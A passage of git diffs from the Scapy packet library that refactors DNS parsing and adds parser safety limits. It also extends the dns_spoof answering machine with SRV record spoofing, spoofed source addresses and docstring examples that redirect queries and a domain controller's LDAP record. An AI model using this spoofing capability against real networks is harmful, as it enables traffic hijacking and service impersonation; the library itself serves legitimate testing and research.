E501 def extract_padding(self, s): return b"", s diff --git a/scapy/contrib/rtcp.py b/scapy/contrib/rtcp.py index 25414182e11..fbf039432ad 100644 --- a/scapy/contrib/rtcp.py +++ b/scapy/contrib/rtcp.py @@ -94,7 +94,12 @@ class SDESChunk(Packet): name = "SDES chunk" fields_desc = [ IntField('sourcesync', None), - PacketListField('items', None, pkt_cls=SDESItem) + PacketListField( + 'items', None, + next_cls_cb=( + lambda x, y, p, z: None if (p and p.chunk_type == 0) else SDESItem + ) + ) ] diff --git a/scapy/contrib/scada/iec104/iec104_information_elements.py b/scapy/contrib/scada/iec104/iec104_information_elements.py index 9c1c07e94b1..f82813d1720 100644 --- a/scapy/contrib/scada/iec104/iec104_information_elements.py +++ b/scapy/contrib/scada/iec104/iec104_information_elements.py @@ -29,9 +29,16 @@ from scapy.contrib.scada.iec104.iec104_fields import \ IEC60870_5_4_NormalizedFixPoint, IEC104SignedSevenBitValue, \ LESignedShortField, LEIEEEFloatField -from scapy.fields import BitEnumField, ByteEnumField, ByteField, \ - ThreeBytesField, \ - BitField, LEShortField, LESignedIntField +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + LEShortField, + LESignedIntField, + MayEnd, + ThreeBytesField, +) def _generate_attributes_and_dicts(cls): @@ -613,7 +620,7 @@ class IEC104_IE_CP56TIME2A(IEC104_IE_CommonQualityFlags): BitField('reserved_2', 0, 2), BitField('hours', 0, 5), BitEnumField('weekday', 0, 3, WEEK_DAY_FLAGS), - BitField('day_of_month', 0, 5), + MayEnd(BitField('day_of_month', 0, 5)), BitField('reserved_3', 0, 4), BitField('month', 0, 4), BitField('reserved_4', 0, 1), @@ -630,7 +637,7 @@ class IEC104_IE_CP56TIME2A_START_TIME(IEC104_IE_CP56TIME2A): informantion_element_fields = [ LEShortField('start_sec_milli', 0), BitEnumField('start_iv', 0, 1, IEC104_IE_CommonQualityFlags.IV_FLAGS), - BitEnumField('start_gen', 0, 1, IEC104_IE_CP56TIME2A.GEN_FLAGS), + MayEnd(BitEnumField('start_gen', 0, 1, IEC104_IE_CP56TIME2A.GEN_FLAGS)), # only valid in monitor direction ToDo: special treatment needed? BitField('start_minutes', 0, 6), BitEnumField('start_su', 0, 1, IEC104_IE_CP56TIME2A.SU_FLAGS), @@ -655,7 +662,7 @@ class IEC104_IE_CP56TIME2A_STOP_TIME(IEC104_IE_CP56TIME2A): informantion_element_fields = [ LEShortField('stop_sec_milli', 0), BitEnumField('stop_iv', 0, 1, IEC104_IE_CommonQualityFlags.IV_FLAGS), - BitEnumField('stop_gen', 0, 1, IEC104_IE_CP56TIME2A.GEN_FLAGS), + MayEnd(BitEnumField('stop_gen', 0, 1, IEC104_IE_CP56TIME2A.GEN_FLAGS)), # only valid in monitor direction ToDo: special treatment needed? BitField('stop_minutes', 0, 6), BitEnumField('stop_su', 0, 1, IEC104_IE_CP56TIME2A.SU_FLAGS), diff --git a/scapy/contrib/socks.py b/scapy/contrib/socks.py index 182e1aff0c3..1aadb5cf2f8 100644 --- a/scapy/contrib/socks.py +++ b/scapy/contrib/socks.py @@ -16,8 +16,15 @@ from scapy.layers.dns import DNSStrField from scapy.layers.inet import TCP, UDP from scapy.layers.inet6 import IP6Field -from scapy.fields import ByteField, ByteEnumField, ShortField, IPField, \ - StrField, MultipleTypeField +from scapy.fields import ( + ByteEnumField, + ByteField, + IPField, + MultipleTypeField, + ShortField, + StrField, + StrNullField, +) from scapy.packet import Packet, bind_layers, bind_bottom_up # TODO: support the 3 different authentication exchange procedures for SOCKS5 # noqa: E501 @@ -86,8 +93,7 @@ class SOCKS4Request(Packet): ByteEnumField("cd", 1, _socks4_cd_request), ShortField("dstport", 80), IPField("dst", "0.0.0.0"), - StrField("userid", ""), - ByteField("null", 0), + StrNullField("userid", ""), ] diff --git a/scapy/contrib/stamp.py b/scapy/contrib/stamp.py index 300064994f7..e2c35389921 100644 --- a/scapy/contrib/stamp.py +++ b/scapy/contrib/stamp.py @@ -225,8 +225,7 @@ class STAMPSessionSenderTestUnauthenticated(Packet): PacketField('err_estimate', ErrorEstimate(), ErrorEstimate), ShortField('ssid', 1), NBytesField('mbz', 0, 28), # 28 bytes MBZ - PacketListField('tlv_objects', [], STAMPTestTLV, - length_from=lambda pkt: pkt.parent.len - 8 - 44), + PacketListField('tlv_objects', [], STAMPTestTLV), ] @@ -297,8 +296,7 @@ class STAMPSessionReflectorTestUnauthenticated(Packet): ShortField('mbz1', 0), ByteField('ttl_sender', 255), NBytesField('mbz2', 0, 3), # 3 bytes MBZ - PacketListField('tlv_objects', [], STAMPTestTLV, - length_from=lambda pkt: pkt.parent.len - 8 - 44), + PacketListField('tlv_objects', [], STAMPTestTLV), ] diff --git a/scapy/fields.py b/scapy/fields.py index 751b6e764e6..a07b11b01cd 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -304,6 +304,7 @@ class _FieldContainer(object): """ A field that acts as a container for another field """ + __slots__ = ["fld"] def __getattr__(self, attr): # type: (str) -> Any @@ -325,13 +326,35 @@ def __eq__(self, other): # type: (Any) -> bool return bool(self.fld == other) - def __ne__(self, other): + def __hash__(self): + # type: () -> int + return hash(self.fld) + + +class MayEnd(_FieldContainer): + """ + Allow packet dissection to end after the dissection of this field + if no bytes are left. + + A good example would be a length field that can be 0 or a set value, + and where it would be too annoying to use multiple ConditionalFields + + Important note: any field below this one MUST default + to an empty value, else the behavior will be unexpected. + """ + __slots__ = ["fld"] + + def __init__(self, fld): + # type: (Any) -> None + self.fld = fld + + def __eq__(self, other): # type: (Any) -> bool - # Python 2.7 compat - return not self == other + return bool(self.fld == other) - # mypy doesn't support __hash__ = None - __hash__ = None # type: ignore + def __hash__(self): + # type: () -> int + return hash(self.fld) class ActionField(_FieldContainer): @@ -353,7 +376,7 @@ class ConditionalField(_FieldContainer): __slots__ = ["fld", "cond"] def __init__(self, - fld, # type: Field[Any, Any] + fld, # type: AnyField cond # type: Callable[[Packet], bool] ): # type: (...) -> None @@ -1133,6 +1156,10 @@ class FieldValueRangeException(Scapy_Exception): pass +class MaximumItemsCount(Scapy_Exception): + pass + + class FieldAttributeException(Scapy_Exception): pass @@ -1577,7 +1604,7 @@ class PacketListField(_PacketField[List[BasePacket]]): (i.e. a stack of layers). All elements in PacketListField have current packet referenced in parent field. """ - __slots__ = ["count_from", "length_from", "next_cls_cb"] + __slots__ = ["count_from", "length_from", "next_cls_cb", "max_count"] islist = 1 def __init__( @@ -1588,6 +1615,7 @@ def __init__( count_from=None, # type: Optional[Callable[[Packet], int]] length_from=None, # type: Optional[Callable[[Packet], int]] next_cls_cb=None, # type: Optional[Callable[[Packet, List[BasePacket], Optional[Packet], bytes], Type[Packet]]] # noqa: E501 + max_count=None, # type: Optional[int] ): # type: (...) -> None """ @@ -1687,6 +1715,8 @@ class object defining a ``dispatch_hook`` class method :param length_from: a callback returning the number of bytes to dissect :param next_cls_cb: a callback returning either None or the type of the next Packet to dissect. + :param max_count: an int containing the max amount of results. This is + a safety mechanism, exceeding this value will raise a Scapy_Exception. """ if default is None: default = [] # Create a new list for each instance @@ -1698,6 +1728,7 @@ class object defining a ``dispatch_hook`` class method self.count_from = count_from self.length_from = length_from self.next_cls_cb = next_cls_cb + self.max_count = max_count def any2i(self, pkt, x): # type: (Optional[Packet], Any) -> List[BasePacket] @@ -1778,6 +1809,12 @@ def getfield(self, pkt, s): else: remain = b"" lst.append(p) + if len(lst) > (self.max_count or conf.max_list_count): + raise MaximumItemsCount( + "Maximum amount of items reached in PacketListField: %s " + "(defaults to conf.max_list_count)" + % (self.max_count or conf.max_list_count) + ) if isinstance(remain, tuple): remain, nb = remain @@ -1886,7 +1923,7 @@ def i2m(self, pkt, y): def m2i(self, pkt, x): # type: (Optional[Packet], bytes) -> bytes - x = x.strip(b"\x00").strip(b" ") + x = x[1:].strip(b"\x00").strip(b" ") return b"".join(map( lambda x, y: chb( (((orb(x) - 1) & 0xf) << 4) + ((orb(y) - 1) & 0xf) @@ -2008,7 +2045,7 @@ def randval(self): class FieldListField(Field[List[Any], List[Any]]): - __slots__ = ["field", "count_from", "length_from"] + __slots__ = ["field", "count_from", "length_from", "max_count"] islist = 1 def __init__( @@ -2018,6 +2055,7 @@ def __init__( field, # type: AnyField length_from=None, # type: Optional[Callable[[Packet], int]] count_from=None, # type: Optional[Callable[[Packet], int]] + max_count=None, # type: Optional[int] ): # type: (...) -> None if default is None: @@ -2026,6 +2064,7 @@ def __init__( Field.__init__(self, name, default) self.count_from = count_from self.length_from = length_from + self.max_count = max_count def i2count(self, pkt, val): # type: (Optional[Packet], List[Any]) -> int @@ -2085,6 +2124,12 @@ def getfield(self, c -= 1 s, v = self.field.getfield(pkt, s) val.append(v) + if len(val) > (self.max_count or conf.max_list_count): + raise MaximumItemsCount( + "Maximum amount of items reached in FieldListField: %s " + "(defaults to conf.max_list_count)" + % (self.max_count or conf.max_list_count) + ) if isinstance(s, tuple): s, bn = s diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 1244ca130a7..db3370eb90d 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -7,6 +7,7 @@ DNS: Domain Name System. """ +import abc import operator import socket import struct @@ -19,7 +20,7 @@ from scapy.config import conf from scapy.compat import orb, raw, chb, bytes_encode, plain_str from scapy.error import log_runtime, warning, Scapy_Exception -from scapy.packet import Packet, bind_layers, NoPayload, Raw +from scapy.packet import Packet, bind_layers, Raw from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ ConditionalField, Field, FieldLenField, FlagsField, IntField, \ PacketListField, ShortEnumField, ShortField, StrField, \ @@ -33,6 +34,7 @@ from typing import ( Any, + List, Optional, Tuple, Type, @@ -66,82 +68,81 @@ dnsclasses = {1: 'IN', 2: 'CS', 3: 'CH', 4: 'HS', 255: 'ANY'} -def dns_get_str(s, pointer=0, pkt=None, _fullpacket=False): +def dns_get_str(s, full=None, _ignore_compression=False): """This function decompresses a string s, starting from the given pointer. :param s: the string to decompress - :param pointer: first pointer on the string (default: 0) - :param pkt: (optional) an InheritOriginDNSStrPacket packet + :param full: (optional) the full packet (used for decompression) :returns: (decoded_string, end_index, left_string) """ - # The _fullpacket parameter is reserved for scapy. It indicates - # that the string provided is the full dns packet, and thus - # will be the same than pkt._orig_str. The "Cannot decompress" - # error will not be prompted if True. + # _ignore_compression is for internal use only max_length = len(s) # The result = the extracted name name = b"" # Will contain the index after the pointer, to be returned after_pointer = None processed_pointers = [] # Used to check for decompression loops - # Analyse given pkt - if pkt and hasattr(pkt, "_orig_s") and pkt._orig_s: - s_full = pkt._orig_s - else: - s_full = None bytes_left = None + _fullpacket = False # s = full packet + pointer = 0 while True: if abs(pointer) >= max_length: log_runtime.info( "DNS RR prematured end (ofs=%i, len=%i)", pointer, len(s) ) break - cur = orb(s[pointer]) # get pointer value + cur = s[pointer] # get pointer value pointer += 1 # make pointer go forward if cur & 0xc0: # Label pointer if after_pointer is None: # after_pointer points to where the remaining bytes start, # as pointer will follow the jump token after_pointer = pointer + 1 + if _ignore_compression: + # skip + pointer += 1 + continue if pointer >= max_length: log_runtime.info( "DNS incomplete jump token at (ofs=%i)", pointer ) break + if not full: + raise Scapy_Exception("DNS message can't be compressed " + + "at this point!") # Follow the pointer - pointer = ((cur & ~0xc0) << 8) + orb(s[pointer]) - 12 + pointer = ((cur & ~0xc0) << 8) + s[pointer] if pointer in processed_pointers: warning("DNS decompression loop detected") break + if len(processed_pointers) >= 20: + warning("More than 20 jumps in a single DNS decompression ! " + "Dropping (evil packet)") + break if not _fullpacket: - # Do we have access to the whole packet ? - if s_full: - # Yes -> use it to continue - bytes_left = s[after_pointer:] - s = s_full - max_length = len(s) - _fullpacket = True - else: - # No -> abort - raise Scapy_Exception("DNS message can't be compressed " + - "at this point!") + # We switch our s buffer to full, so we need to remember + # the previous context + bytes_left = s[after_pointer:] + s = full + max_length = len(s) + _fullpacket = True processed_pointers.append(pointer) continue elif cur > 0: # Label # cur = length of the string name += s[pointer:pointer + cur] + b"." pointer += cur - else: + else: # End break if after_pointer is not None: # Return the real end index (not the one we followed) pointer = after_pointer if bytes_left is None: bytes_left = s[pointer:] - # name, end_index, remaining - return name, pointer, bytes_left, len(processed_pointers) != 0 + # name, remaining + return name or b".", bytes_left def _is_ptr(x): @@ -194,19 +195,16 @@ def dns_compress(pkt): def field_gen(dns_pkt): """Iterates through all DNS strings that can be compressed""" for lay in [dns_pkt.qd, dns_pkt.an, dns_pkt.ns, dns_pkt.ar]: - if lay is None: + if not lay: continue - current = lay - while not isinstance(current, NoPayload): - if isinstance(current, InheritOriginDNSStrPacket): - for field in current.fields_desc: - if isinstance(field, DNSStrField) or \ - (isinstance(field, MultipleTypeField) and - current.type in [2, 3, 4, 5, 12, 15]): - # Get the associated data and store it accordingly # noqa: E501 - dat = current.getfieldval(field.name) - yield current, field.name, dat - current = current.payload + for current in lay: + for field in current.fields_desc: + if isinstance(field, DNSStrField) or \ + (isinstance(field, MultipleTypeField) and + current.type in [2, 3, 4, 5, 12, 15]): + # Get the associated data and store it accordingly # noqa: E501 + dat = current.getfieldval(field.name) + yield current, field.name, dat def possible_shortens(dat): """Iterates through all possible compression parts in a DNS string""" @@ -267,13 +265,13 @@ def possible_shortens(dat): return dns_pkt -class InheritOriginDNSStrPacket(Packet): - __slots__ = Packet.__slots__ + ["_orig_s", "_orig_p"] - - def __init__(self, _pkt=None, _orig_s=None, _orig_p=None, *args, **kwargs): - self._orig_s = _orig_s - self._orig_p = _orig_p - Packet.__init__(self, _pkt=_pkt, *args, **kwargs) +class DNSCompressedPacket(Packet): + """ + Class to mark that a packet contains DNSStrField and supports compression + """ + @abc.abstractmethod + def get_full(self): + pass class DNSStrField(StrLenField): @@ -282,7 +280,6 @@ class DNSStrField(StrLenField): It will also handle DNS decompression. (may be StrLenField if a length_from is passed), """ - __slots__ = ["compressed"] def h2i(self, pkt, x): if not x: @@ -297,114 +294,23 @@ def i2m(self, pkt, x): def i2len(self, pkt, x): return len(self.i2m(pkt, x)) + def get_full(self, pkt): + while pkt and not isinstance(pkt, DNSCompressedPacket): + pkt = pkt.parent or pkt.underlayer + if not pkt: + return None + return pkt.get_full() + def getfield(self, pkt, s): remain = b"" if self.length_from: remain, s = super(DNSStrField, self).getfield(pkt, s) # Decode the compressed DNS message - decoded, _, left, self.compressed = dns_get_str(s, 0, pkt) + decoded, left = dns_get_str(s, full=self.get_full(pkt)) # returns (remaining, decoded) return left + remain, decoded -class DNSRRCountField(ShortField): - __slots__ = ["rr"] - - def __init__(self, name, default, rr): - ShortField.__init__(self, name, default) - self.rr = rr - - def _countRR(self, pkt): - x = getattr(pkt, self.rr) - i = 0 - while isinstance(x, (DNSRR, DNSQR)) or isdnssecRR(x): - x = x.payload - i += 1 - return i - - def i2m(self, pkt, x): - if x is None: - x = self._countRR(pkt) - return x - - def i2h(self, pkt, x): - if x is None: - x = self._countRR(pkt) - return x - - -class DNSRRField(StrField): - __slots__ = ["countfld", "passon", "rr"] - holds_packets = 1 - - def __init__(self, name, countfld, default, passon=1): - StrField.__init__(self, name, None) - self.countfld = countfld - # Notes: - # - self.rr: used by DNSRRCountField() to compute the records count - # - self.default: used to set the default record - self.rr = self.default = default - self.passon = passon - - def i2m(self, pkt, x): - if x is None: - return b"" - return bytes_encode(x) - - def decodeRR(self, name, s, p): - ret = s[p:p + 10] - # type, cls, ttl, rdlen - typ, cls, _, rdlen = struct.unpack("!HHIH", ret) - p += 10 - cls = DNSRR_DISPATCHER.get(typ, DNSRR) - rr = cls(b"\x00" + ret + s[p:p + rdlen], _orig_s=s, _orig_p=p) - - # Reset rdlen if DNS compression was used - for fname in rr.fieldtype.keys(): - rdata_obj = rr.fieldtype[fname] - if fname == "rdata" and isinstance(rdata_obj, MultipleTypeField): - rdata_obj = rdata_obj._find_fld_pkt_val(rr, rr.type)[0] - if isinstance(rdata_obj, DNSStrField) and rdata_obj.compressed: - del rr.rdlen - break - rr.rrname = name - - p += rdlen - return rr, p - - def getfield(self, pkt, s): - if isinstance(s, tuple): - s, p = s - else: - p = 0 - ret = None - c = getattr(pkt, self.countfld) - if c > len(s): - log_runtime.info("DNS wrong value: DNS.%s=%i", self.countfld, c) - return s, b"" - while c: - c -= 1 - name, p, _, _ = dns_get_str(s, p, _fullpacket=True) - rr, p = self.decodeRR(name, s, p) - if ret is None: - ret = rr - else: - ret.add_payload(rr) - if self.passon: - return (s, p), ret - else: - return s[p:], ret - - -class DNSQRField(DNSRRField): - def decodeRR(self, name, s, p): - ret = s[p:p + 4] - p += 4 - rr = DNSQR(b"\x00" + ret, _orig_s=s, _orig_p=p) - rr.qname = name - return rr, p - - class DNSTextField(StrLenField): """ Special StrLenField that handles DNS TEXT data (16) @@ -451,93 +357,6 @@ def i2m(self, pkt, s): return ret_s -class DNSQR(InheritOriginDNSStrPacket): - name = "DNS Question Record" - show_indent = 0 - fields_desc = [DNSStrField("qname", "www.example.com"), - ShortEnumField("qtype", 1, dnsqtypes), - ShortEnumField("qclass", 1, dnsclasses)] - - -class DNS(Packet): - name = "DNS" - fields_desc = [ - ConditionalField(ShortField("length", None), - lambda p: isinstance(p.underlayer, TCP)), - ShortField("id", 0), - BitField("qr", 0, 1), - BitEnumField("opcode", 0, 4, {0: "QUERY", 1: "IQUERY", 2: "STATUS"}), - BitField("aa", 0, 1), - BitField("tc", 0, 1), - BitField("rd", 1, 1), - BitField("ra", 0, 1), - BitField("z", 0, 1), - # AD and CD bits are defined in RFC 2535 - BitField("ad", 0, 1), # Authentic Data - BitField("cd", 0, 1), # Checking Disabled - BitEnumField("rcode", 0, 4, {0: "ok", 1: "format-error", - 2: "server-failure", 3: "name-error", - 4: "not-implemented", 5: "refused"}), - DNSRRCountField("qdcount", None, "qd"), - DNSRRCountField("ancount", None, "an"), - DNSRRCountField("nscount", None, "ns"), - DNSRRCountField("arcount", None, "ar"), - DNSQRField("qd", "qdcount", DNSQR()), - DNSRRField("an", "ancount", None), - DNSRRField("ns", "nscount", None), - DNSRRField("ar", "arcount", None, 0), - ] - - def answers(self, other): - return (isinstance(other, DNS) and - self.id == other.id and - self.qr == 1 and - other.qr == 0) - - def mysummary(self): - name = "" - if self.qr: - type = "Ans" - if self.ancount > 0 and isinstance(self.an, DNSRR): - name = ' "%s"' % self.an.rdata - else: - type = "Qry" - if self.qdcount > 0 and isinstance(self.qd, DNSQR): - name = ' "%s"' % self.qd.qname - return 'DNS %s%s ' % (type, name) - - def post_build(self, pkt, pay): - if isinstance(self.underlayer, TCP) and self.length is None: - pkt = struct.pack("!H", len(pkt) - 2) + pkt[2:] - return pkt + pay - - def compress(self): - """Return the compressed DNS packet (using `dns_compress()`""" - return dns_compress(self) - - def pre_dissect(self, s): - """ - Check that a valid DNS over TCP message can be decoded - """ - if isinstance(self.underlayer, TCP): - - # Compute the length of the DNS packet - if len(s) >= 2: - dns_len = struct.unpack("!H", s[:2])[0] - else: - message = "Malformed DNS message: too small!" - log_runtime.info(message) - raise Scapy_Exception(message) - - # Check if the length is valid - if dns_len < 14 or len(s) < dns_len: - message = "Malformed DNS message: invalid length!" - log_runtime.info(message) - raise Scapy_Exception(message) - - return s - - # RFC 2671 - Extension Mechanisms for DNS (EDNS0) edns0types = {0: "Reserved", 1: "LLQ", 2: "UL", 3: "NSID", 4: "Reserved", @@ -568,7 +387,7 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return EDNS0TLV -class DNSRROPT(InheritOriginDNSStrPacket): +class DNSRROPT(Packet): name = "DNS OPT Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 41, dnstypes), @@ -782,7 +601,7 @@ def i2repr(self, pkt, x): return [dnstypes.get(rr, rr) for rr in rrlist] if rrlist else repr(x) -class _DNSRRdummy(InheritOriginDNSStrPacket): +class _DNSRRdummy(Packet): name = "Dummy class that implements post_build() for Resource Records" def post_build(self, pkt, pay): @@ -796,6 +615,9 @@ def post_build(self, pkt, pay): return tmp_pkt + pkt + pay + def default_payload_class(self, payload): + return conf.padding_layer + class DNSRRMX(_DNSRRdummy): name = "DNS MX Resource Record" @@ -1024,14 +846,8 @@ class DNSRRTSIG(_DNSRRdummy): 32769: DNSRRDLV, # RFC 4431 } -DNSSEC_CLASSES = tuple(DNSRR_DISPATCHER.values()) - - -def isdnssecRR(obj): - return isinstance(obj, DNSSEC_CLASSES) - -class DNSRR(InheritOriginDNSStrPacket): +class DNSRR(Packet): name = "DNS Resource Record" show_indent = 0 fields_desc = [DNSStrField("rrname", ""), @@ -1060,6 +876,166 @@ class DNSRR(InheritOriginDNSStrPacket): length_from=lambda pkt:pkt.rdlen) )] + def default_payload_class(self, payload): + return conf.padding_layer + + +def _DNSRR(s, **kwargs): + """ + DNSRR dispatcher func + """ + if s: + # Try to find the type of the RR using the dispatcher + _, remain = dns_get_str(s, _ignore_compression=True) + cls = DNSRR_DISPATCHER.get( + struct.unpack("!H", remain[:2])[0], + DNSRR, + ) + rrlen = ( + len(s) - len(remain) + # rrname len + 10 + + struct.unpack("!H", remain[8:10])[0] + ) + pkt = cls(s[:rrlen], **kwargs) / conf.padding_layer(s[rrlen:]) + # drop rdlen because if rdata was compressed, it will break everything + # when rebuilding + del pkt.fields["rdlen"] + return pkt + return None + + +class DNSQR(Packet): + name = "DNS Question Record" + show_indent = 0 + fields_desc = [DNSStrField("qname", "www.example.com"), + ShortEnumField("qtype", 1, dnsqtypes), + ShortEnumField("qclass", 1, dnsclasses)] + + def default_payload_class(self, payload): + return conf.padding_layer + + +class _DNSPacketListField(PacketListField): + # A normal PacketListField with backward-compatible hacks + def any2i(self, pkt, x): + # type: (Optional[Packet], List[Any]) -> List[Any] + if x is None: + warnings.warn( + ("The DNS fields 'qd', 'an', 'ns' and 'ar' are now " + "PacketListField(s) ! " + "Setting a null default should be [] instead of None"), + DeprecationWarning + ) + x = [] + return super(_DNSPacketListField, self).any2i(pkt, x) + + def i2h(self, pkt, x): + # type: (Optional[Packet], List[Packet]) -> Any + class _list(list): + """ + Fake list object to provide compatibility with older DNS fields + """ + def __getattr__(self, attr): + try: + ret = getattr(self[0], attr) + warnings.warn( + ("The DNS fields 'qd', 'an', 'ns' and 'ar' are now " + "PacketListField(s) ! " + "To access the first element, use pkt.an[0] instead of " + "pkt.an"), + DeprecationWarning + ) + return ret + except AttributeError: + raise + return _list(x) + + +class DNS(DNSCompressedPacket): + name = "DNS" + fields_desc = [ + ConditionalField(ShortField("length", None), + lambda p: isinstance(p.underlayer, TCP)), + ShortField("id", 0), + BitField("qr", 0, 1), + BitEnumField("opcode", 0, 4, {0: "QUERY", 1: "IQUERY", 2: "STATUS"}), + BitField("aa", 0, 1), + BitField("tc", 0, 1), + BitField("rd", 1, 1), + BitField("ra", 0, 1), + BitField("z", 0, 1), + # AD and CD bits are defined in RFC 2535 + BitField("ad", 0, 1), # Authentic Data + BitField("cd", 0, 1), # Checking Disabled + BitEnumField("rcode", 0, 4, {0: "ok", 1: "format-error", + 2: "server-failure", 3: "name-error", + 4: "not-implemented", 5: "refused"}), + FieldLenField("qdcount", None, count_of="qd"), + FieldLenField("ancount", None, count_of="an"), + FieldLenField("nscount", None, count_of="ns"), + FieldLenField("arcount", None, count_of="ar"), + _DNSPacketListField("qd", [DNSQR()], DNSQR, count_from=lambda pkt: pkt.qdcount), + _DNSPacketListField("an", [], _DNSRR, count_from=lambda pkt: pkt.ancount), + _DNSPacketListField("ns", [], _DNSRR, count_from=lambda pkt: pkt.nscount), + _DNSPacketListField("ar", [], _DNSRR, count_from=lambda pkt: pkt.arcount), + ] + + def get_full(self): + # Required for DNSCompressedPacket + if isinstance(self.underlayer, TCP): + return self.original[2:] + else: + return self.original + + def answers(self, other): + return (isinstance(other, DNS) and + self.id == other.id and + self.qr == 1 and + other.qr == 0) + + def mysummary(self): + name = "" + if self.qr: + type = "Ans" + if self.an and isinstance(self.an, DNSRR): + name = ' "%s"' % self.an[0].rdata + else: + type = "Qry" + if self.qd and isinstance(self.qd, DNSQR): + name = ' "%s"' % self.qd[0].qname + return 'DNS %s%s ' % (type, name) + + def post_build(self, pkt, pay): + if isinstance(self.underlayer, TCP) and self.length is None: + pkt = struct.pack("!H", len(pkt) - 2) + pkt[2:] + return pkt + pay + + def compress(self): + """Return the compressed DNS packet (using `dns_compress()`)""" + return dns_compress(self) + + def pre_dissect(self, s): + """ + Check that a valid DNS over TCP message can be decoded + """ + if isinstance(self.underlayer, TCP): + + # Compute the length of the DNS packet + if len(s) >= 2: + dns_len = struct.unpack("!H", s[:2])[0] + else: + message = "Malformed DNS message: too small!" + log_runtime.info(message) + raise Scapy_Exception(message) + + # Check if the length is valid + if dns_len < 14 or len(s) < dns_len: + message = "Malformed DNS message: invalid length!" + log_runtime.info(message) + raise Scapy_Exception(message) + + return s + bind_layers(UDP, DNS, dport=5353) bind_layers(UDP, DNS, sport=5353) @@ -1117,63 +1093,139 @@ class DNS_am(AnsweringMachine): cls = DNS # We use this automaton for llmnr_spoof def parse_options(self, joker=None, - match=None, joker6=None, from_ip=None): + match=None, + srvmatch=None, + joker6=False, + from_ip=None, + from_ip6=None, + src_ip=None, + src_ip6=None, + ttl=10): """ :param joker: default IPv4 for unresolved domains. (Default: None) Set to False to disable, None to mirror the interface's IP. :param joker6: default IPv6 for unresolved domains (Default: False) set to False to disable, None to mirror the interface's IPv6. - :param match: a dictionary of {names: (ip, ipv6)} + :param match: a dictionary of {name: val} where name is a string representing + a domain name (A, AAAA) and val is a tuple of 2 elements, each + representing an IP or a list of IPs + :param srvmatch: a dictionary of {name: (port, target)} used for SRV :param from_ip: an source IP to filter. Can contain a netmask + :param from_ip6: an source IPv6 to filter. Can contain a netmask + :param ttl: the DNS time to live (in seconds) + :param src_ip: + :param src_ip6: + + Example: + + >>> dns_spoof(joker="192.168.0.2", iface="eth0") + >>> dns_spoof(match={ + ... "_ldap._tcp.dc._msdcs.DOMAIN.LOCAL.": (389, "srv1.domain.local") + ... }) """ if match is None: self.match = {} else: - self.match = match + assert all(isinstance(x, (tuple, list)) for x in match.values()), ( + "'match' values must be a tuple of 2 elements: ('', '')" + ". They can be None" + ) + self.match = {bytes_encode(k): v for k, v in match.items()} + if srvmatch is None: + self.srvmatch = {} + else: + assert all(isinstance(x, (tuple, list)) for x in srvmatch.values()), ( + "'srvmatch' values must be a tuple of 2 elements: (port, 'target')" + ) + self.srvmatch = {bytes_encode(k): v for k, v in srvmatch.items()} self.joker = joker self.joker6 = joker6 if isinstance(from_ip, str): self.from_ip = Net(from_ip) else: self.from_ip = from_ip + if isinstance(from_ip6, str): + self.from_ip6 = Net(from_ip6) + else: + self.from_ip6 = from_ip6 + self.src_ip = src_ip + self.src_ip6 = src_ip6 + self.ttl = ttl def is_request(self, req): from scapy.layers.inet6 import IPv6 return ( req.haslayer(self.cls) and - req.getlayer(self.cls).qr == 0 and - (not self.from_ip or ( - req[IPv6].src in req if IPv6 in req else req[IP].src - ) in self.from_ip) + req.getlayer(self.cls).qr == 0 and ( + ( + not self.from_ip6 or req[IPv6].src in self.from_ip6 + ) + if IPv6 in req else + ( + not self.from_ip or req[IP].src in self.from_ip + ) + ) ) def make_reply(self, req): - IPcls = IPv6 if IPv6 in req else IP - resp = IPcls(dst=req[IPcls].src) / UDP(sport=req.dport, dport=req.sport) - dns = req.getlayer(self.cls) - if req.qd.qtype == 28: - # AAAA - if self.joker6 is False: - return - rdata = self.match.get( - dns.qd.qname, - self.joker or get_if_addr6(self.optsniff.get("iface", conf.iface)) - ) - if isinstance(rdata, (tuple, list)): - rdata = rdata[1] - resp /= self.cls(id=dns.id, qr=1, qd=dns.qd, - an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=rdata, - type=28)) + if IPv6 in req: + resp = IPv6(dst=req[IPv6].src, src=self.src_ip6) else: - if self.joker is False: - return - rdata = self.match.get( - dns.qd.qname, - self.joker or get_if_addr(self.optsniff.get("iface", conf.iface)) - ) - if isinstance(rdata, (tuple, list)): - # Fallback - rdata = rdata[0] - resp /= self.cls(id=dns.id, qr=1, qd=dns.qd, - an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=rdata)) + resp = IP(dst=req[IP].src, src=self.src_ip) + resp /= UDP(sport=req.dport, dport=req.sport) + ans = [] + req = req.getlayer(self.cls) + for rq in req.qd: + if rq.qtype in [1, 28]: + # A or AAAA + if rq.qtype == 28: + # AAAA + try: + rdata = self.match[rq.qname][1] + except KeyError: + if self.joker6 is False: + return + rdata = self.joker6 or get_if_addr6( + self.optsniff.get("iface", conf.iface) + ) + elif rq.qtype == 1: + # A + try: + rdata = self.match[rq.qname][0] + except KeyError: + if self.joker is False: + return + rdata = self.joker or get_if_addr( + self.optsniff.get("iface", conf.iface) + ) + if rdata is None: + # Ignore None + return + # Common A and AAAA + if not isinstance(rdata, list): + rdata = [rdata] + ans.extend([ + DNSRR(rrname=rq.qname, ttl=self.ttl, rdata=x, type=rq.qtype) + for x in rdata + ]) + elif rq.qtype == 33: + # SRV + try: + port, target = self.srvmatch[rq.qname] + except KeyError: + return + ans.append(DNSRRSRV( + rrname=rq.qname, + port=port, + target=target, + weight=100, + ttl=self.ttl + )) + else: + # Not handled + continue + # Common: All + if not ans: + return + resp /= self.cls(id=req.id, qr=1, qd=req.qd, an=ans) return resp diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 5eeafa0ed29..1cc38b6f8e9 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -38,6 +38,7 @@ LEShortEnumField, LEShortField, LESignedIntField, + MayEnd, MultipleTypeField, OUIField, PacketField, @@ -1270,14 +1271,15 @@ class Dot11EltCountry(Dot11Elt): ByteEnumField("ID", 7, _dot11_id_enum), 